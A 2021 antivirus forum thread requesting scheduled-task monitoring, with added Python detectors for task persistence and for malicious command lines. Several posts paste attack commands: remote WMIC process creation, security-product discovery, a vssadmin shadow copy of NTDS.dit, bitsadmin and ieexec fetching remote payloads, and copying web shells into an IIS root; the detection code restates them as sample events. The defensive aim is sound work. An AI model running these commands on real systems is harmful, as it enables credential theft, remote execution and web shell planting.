KATANA feature request


6 replies to this topic

#1 sepik

sepik

    Newbie

  • Posters
  • 5 Posts:

Posted 11 May 2021 - 13:21

Hello,

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?

I've been testing the SS Beta for several months against different kinds of malware, and I really liked how Katana/DPD/DPH block some unknown malware.

Of course, some unknown malware gets through (I've submitted a dozen of them to the virus lab), and some of them add a task scheduler entry that calls undetected dropped files in the %appdata% roaming dir.

So every time the PC gets booted, the malware can run its dropped files via the task scheduler.

 

Regards,

-sepik
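
The persistence pattern described in the post (a task that fires at boot or logon and whose action points at a dropped file under %appdata%) can be checked offline from the task definition XML that Windows stores for every registered task. The Python below is an added example written for this page; it is not code from the thread, from SS or from Katana. The task names, paths and the four XML samples are constructed for the example. It goes a little beyond the post in two ways: it also catches the variant where a signed script host (wscript.exe, powershell.exe, ...) is the command and the dropped payload is only in the arguments, and the variant where the command is a bare file name resolved against a user-writable WorkingDirectory.

```python
"""Flag scheduled tasks whose action runs something from a user-writable
directory, the persistence pattern described in the post above.
Input is the task definition XML that `schtasks /query /tn <name> /xml`
prints (the same XML stored under %SystemRoot%\\System32\\Tasks; those
files are UTF-16 with a BOM, so read them in binary mode and pass bytes).
All samples below are constructed for this example."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations an unprivileged user, and so malware running as that user, can
# write to. Task XML usually keeps %VAR% forms unexpanded, so match both.
USER_WRITABLE_RE = re.compile(
    r"%(appdata|localappdata|temp|tmp|public|userprofile)%"
    r"|[a-z]:\\users\\[^\\]+\\appdata\\"
    r"|[a-z]:\\users\\public\\"
    r"|[a-z]:\\windows\\temp\\"
    r"|[a-z]:\\programdata\\",
    re.IGNORECASE,
)
# Signed script/loader hosts: the payload is in <Arguments>, not <Command>.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
# Triggers that fire with no user action, at boot or logon.
AUTOSTART_TRIGGERS = {"BootTrigger", "LogonTrigger"}

def _text(elem, path):
    node = elem.find(path, NS)
    return (node.text or "").strip() if node is not None else ""

def _basename(command):
    return command.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess_task(xml_doc) -> dict:
    """Verdict for one task definition (str or bytes). Only <Exec> actions
    are inspected; <ComHandler> actions (a CLSID) need a registry lookup."""
    root = ET.fromstring(xml_doc)
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [t.tag.split("}", 1)[-1] for t in trig]
    reasons = []
    for exe in root.findall("t:Actions/t:Exec", NS):
        command = _text(exe, "t:Command")
        arguments = _text(exe, "t:Arguments")
        workdir = _text(exe, "t:WorkingDirectory")
        binary = _basename(command)
        if USER_WRITABLE_RE.search(command):
            reasons.append(f"command runs from user-writable path: {command}")
        elif "\\" not in command.strip('"') and USER_WRITABLE_RE.search(workdir):
            # A bare file name is resolved against WorkingDirectory first.
            reasons.append(f"bare command {command!r} resolved in {workdir}")
        if binary in SCRIPT_HOSTS and USER_WRITABLE_RE.search(arguments):
            reasons.append(f"{binary} loads payload from user-writable path: {arguments}")
    return {
        "uri": _text(root, "t:RegistrationInfo/t:URI"),
        "triggers": triggers,
        "autostart": any(t in AUTOSTART_TRIGGERS for t in triggers),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }

def scan_tasks(docs):
    """Suspicious verdicts among `docs`, boot/logon-triggered ones first."""
    hits = [v for v in map(assess_task, docs) if v["suspicious"]]
    return sorted(hits, key=lambda v: not v["autostart"])

# Constructed samples (not real exports). A system-owned binary on a calendar trigger:
BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Contoso\NightlyCleanup</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\system32\cleanmgr.exe</Command>
  <Arguments>/autoclean</Arguments></Exec></Actions></Task>"""
# The pattern from the post: boot trigger, dropped binary under %APPDATA%.
DROPPED_EXE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Update\SvcHost</URI></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec>
  <Command>C:\Users\alice\AppData\Roaming\Microsoft\svchost.exe</Command></Exec></Actions></Task>"""
# Same idea behind a signed script host: the payload is in <Arguments>.
SCRIPT_HOST_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Adobe\AdobeUpdater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%SystemRoot%\System32\wscript.exe</Command>
  <Arguments>//B "%APPDATA%\Adobe\update.vbs"</Arguments></Exec></Actions></Task>"""
# Bare file name plus a user-writable WorkingDirectory; no RegistrationInfo at all.
BARE_NAME_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>update.exe</Command>
  <WorkingDirectory>%LOCALAPPDATA%\Temp</WorkingDirectory></Exec></Actions></Task>"""
SAMPLES = [BENIGN_TASK, DROPPED_EXE_TASK, SCRIPT_HOST_TASK, BARE_NAME_TASK]

if __name__ == "__main__":
    for v in scan_tasks(SAMPLES):
        print(v["uri"] or "(no URI)", v["triggers"], *v["reasons"], sep="\n  ")
```

Run as-is it reports the three constructed persistence tasks and stays quiet on the cleanmgr one. Pointed at a real machine (iterate the files under %SystemRoot%\System32\Tasks and pass their bytes to assess_task) it gives the same "what runs from where, and on which trigger" view that an allow/ask/block prompt in the product would need; a ComHandler action or a task whose command is under Program Files is deliberately not flagged, so the result is a shortlist to look at, not a verdict.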

 

 

 



#2 sepik

sepik

    Newbie

  • Posters
  • 5 Posts:

Posted 11 May 2021 - 16:46

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

 

To kill an AV and any firewall product installed.

It seems that it creates "calc.exe" to gain the system account, and when you have system privileges, the whole system is compromised.

 

Regards,

-sepik



#3 sepik

sepik

    Newbie

  • Posters
  • 5 Posts:

Posted 11 May 2021 - 16:51

Hello,

wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%#{service_search_string} (%")
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
wmic process call create calc.exe
wmic /node:"192.168.0.1" process call create #{process_to_execute}
wmic /node:"192.168.0.1" process call create calc.exe
wmic.exe /NODE:*process call create*
wmic.exe /NODE:*path AntiVirusProduct get*
wmic.exe /NODE:*path FirewallProduct get*
WmiPrvSE.exe
wmic.exe /NODE: "192.168.0.1" process call create "*.exe"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM <path> ^> <path>"
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"

 

To kill an AV and any firewall product installed.

It seems that it creates "calc.exe" to gain the system account, and when you have system privileges, the whole system is compromised.

 

Also, as a signed MS component, bitsadmin.exe /transfer "DownloadFile" http://www.mypage.com/ %temp%/mydropper.html gets through too.

 

 

Regards,

-sepik



#4 sepik

sepik

    Newbie

  • Posters
  • 5 Posts:

Posted 11 May 2021 - 17:18

Sorry Double-post.

-sepik



#5 SergSG

SergSG

    The Master

  • Posters
  • 14,425 Posts:

Posted 11 May 2021 - 17:54

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?

Of course, some unknown malware gets through (I've submitted a dozen of them to the virus lab), and some of them add a task scheduler entry that calls undetected dropped files in the %appdata% roaming dir.

So every time the PC gets booted, the malware can run its dropped files via the task scheduler.

 

+1



#6 sepik

sepik

    Newbie

  • Posters
  • 5 Posts:

Posted 11 May 2021 - 19:54

xcopy #{web_shells} C:\inetpub\wwwroot
xcopy PathToAtomicsFolder\T1100\shells\ C:\inetpub\wwwroot
ieexec.exe http://*:8080/bypass.exe
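
The command lines pasted in posts #2/#3 and #6 (WMIC process creation, locally and through /node:, the AntiVirusProduct/FirewallProduct queries, bitsadmin /transfer, xcopy into inetpub\wwwroot, ieexec.exe pointed at a URL) are all visible in ordinary process-creation telemetry, which is where a detection rather than a prompt would catch them. The Python below is an added example for this page, not code from the thread or from SS/Katana. The events it runs over are constructed in Sysmon Event ID 1 style (fields Image, CommandLine, ParentImage; hostnames, IPs and paths are made up, and the `*` and `#{...}` placeholders of the posted lines are replaced by concrete values). It also flags any child of WmiPrvSE.exe, which is how the posted "process call create calc.exe" shows up on the target host whatever the child process is.

```python
"""Flag the WMIC / bitsadmin / xcopy / ieexec command lines from the posts
above in process-creation telemetry. Events are constructed here with the
Sysmon Event ID 1 field names (Image, CommandLine, ParentImage); adapt the
names if you feed Security 4688 events instead."""
import re

# (label, pattern over CommandLine). One event can collect several labels,
# e.g. a remote WMIC call whose payload itself creates a shadow copy.
RULES = [
    # T1047-style execution through WMI; /node: means a remote target
    ("wmic_process_create",
     re.compile(r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b", re.I)),
    ("wmic_remote_node",
     re.compile(r"\bwmic(\.exe)?\b.*\s/node:", re.I)),
    # Security-product discovery through the root\SecurityCenter2 classes
    ("wmic_security_product_discovery",
     re.compile(r"\bwmic(\.exe)?\b.*\b(AntiVirusProduct|FirewallProduct|AntiSpywareProduct)\b", re.I)),
    # Host/account inventory; low severity alone, useful for correlation
    ("wmic_inventory",
     re.compile(r"\bwmic(\.exe)?\b.*\b(useraccount|qfe|service|process)\s+(get|where|list)\b", re.I)),
    # Ingress tool transfer through the signed BITS client
    ("bitsadmin_download",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b.*https?://", re.I)),
    # Shadow copy creation, the usual prelude to lifting NTDS.dit or the SAM
    ("vss_shadow_create",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    # Legacy at.exe scheduling ("at 9:00PM <path>"), often wrapped in a remote create
    ("at_scheduling",
     re.compile(r"(^|[\s\"'])at(\.exe)?\s+\d{1,2}:\d{2}", re.I)),
    # Copying files into an IIS web root (web shell drop)
    ("webshell_drop",
     re.compile(r"\b(xcopy|copy|move|robocopy)\b.*\\inetpub\\wwwroot", re.I)),
    # ieexec.exe fetching and running a .NET executable from a URL
    ("ieexec_remote_exec",
     re.compile(r"\bieexec(\.exe)?\s+https?://", re.I)),
]

def classify(event: dict) -> list:
    """Return the rule labels that fire for one process-creation event."""
    cmd = event.get("CommandLine", "")
    labels = [label for label, rx in RULES if rx.search(cmd)]
    # Anything parented by WmiPrvSE.exe was started through Win32_Process.Create,
    # whatever the child is. That is how a 'process call create' lands on the
    # target host, where the wmic.exe command line itself is never seen.
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent == "wmiprvse.exe":
        labels.append("spawned_by_wmiprvse")
    return labels

def scan(events):
    """[(CommandLine, labels)] for every event that fired at least one rule."""
    hits = []
    for ev in events:
        labels = classify(ev)
        if labels:
            hits.append((ev["CommandLine"], labels))
    return hits

CMD = r"C:\Windows\System32\cmd.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"

def _ev(image, cmdline, parent=CMD):
    return {"Image": image, "CommandLine": cmdline, "ParentImage": parent}

# Constructed sample events mirroring the posted command lines (not real telemetry).
EVENTS = [
    _ev(WMIC, r'wmic /node:"192.168.0.1" process call create calc.exe'),
    _ev(WMIC, r'wmic.exe /NODE:"192.168.0.1" path AntiVirusProduct get displayName'),
    _ev(r"C:\Windows\System32\calc.exe", "calc.exe",
        parent=r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    _ev(WMIC, r'wmic.exe /node:FILESRV01 PROCESS call create "cmd /c vssadmin create shadow /for=C: > c:\not_the_NTDS.dit"'),
    _ev(WMIC, r'wmic.exe /node:WS01 PROCESS call create "at 9:00PM C:\Tools\run.exe ^> C:\Temp\out.txt"'),
    _ev(r"C:\Windows\System32\bitsadmin.exe",
        r"bitsadmin.exe /transfer DownloadFile http://www.mypage.com/mydropper.html %temp%\mydropper.html"),
    _ev(r"C:\Windows\System32\xcopy.exe", r"xcopy C:\Users\Public\shells\ C:\inetpub\wwwroot /E /Y"),
    _ev(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ieexec.exe",
        r"ieexec.exe http://192.168.0.1:8080/bypass.exe"),
    _ev(WMIC, r"wmic qfe get description,installedOn /format:csv"),
    _ev(CMD, r'cmd.exe /c dir "C:\Users\alice\Documents"'),
]

if __name__ == "__main__":
    for cmdline, labels in scan(EVENTS):
        print(f"{', '.join(labels):<58} {cmdline}")
```

Nine of the ten constructed events fire; only the plain `dir` does not. The point of the WmiPrvSE.exe parent check is the one sepik makes about calc.exe: on the machine that received the WMI call there is no wmic.exe in the picture at all, just an unexpected child of the WMI provider host, so a rule that only looks for the wmic.exe command line misses the target side entirely. The inventory rule (useraccount/qfe/process/service get) is noisy by itself and is there to correlate with the others, not to alert on its own.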



#7 usverg

usverg

    Advanced Member

  • Posters
  • 700 Posts:

Posted 12 May 2021 - 08:01

In SS and Katana, is it possible to add a feature that monitors new task scheduler entries (allow, ask, block)?
Definitely +1

But a thing of beauty, I know, will never fade away...


